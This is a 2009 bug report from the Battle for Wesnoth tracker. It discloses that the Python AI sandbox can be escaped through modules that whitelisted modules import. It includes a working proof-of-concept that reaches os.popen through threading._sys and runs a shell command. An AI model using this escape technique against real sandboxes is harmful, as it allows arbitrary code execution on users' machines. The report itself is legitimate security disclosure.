URL:
<http://gna.org/bugs/?13048>
Summary: Hole in Python AI sandbox permits arbitrary code
execution
Project: Battle for Wesnoth
Submitted by: dfranke
Submitted on: Sunday 02/22/2009 at 08:45
Category: Bug
Severity: 6 - Security
Priority: 5 - Normal
Item Group: Artificial Intelligence
Status: None
Privacy: Private
Assigned to: None
Originator Email:
Open/Closed: Open
Discussion Lock: Any
Release: 1.5.10+svn
Operating System: Linux
_______________________________________________________
Details:
In Python, if module A imports module B and module B imports module C, A can
access C by referencing it as 'B.C'.
This permits Wesnoth Python AIs to escape their sandbox, because some
whitelisted module import other modules that are unsafe. For example, in
Python 2.5.2, 'threading', which is a whitelisted module, contains the line
'import sys as _sys'.
Here's a proof-of-concept that gives Wesnoth an interesting new soundtrack,
assuming /usr/bin/firefox exists:
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.youtube.com/watch?v=oHg5SJYRHA0'")
f.close()
Take note of bug #13047 before using multiplayer to test this. Until that
bug is fixed, you can just add this code into kamikaze.py in Descent into
Darkness and skip to the third scenario.
_______________________________________________________
Reply to this item at:
<http://gna.org/bugs/?13048>
_______________________________________________
Message sent via/by Gna!
http://gna.org/
_______________________________________________
Wesnoth-bugs mailing list
[email protected]
https://mail.gna.org/listinfo/wesnoth-bugs
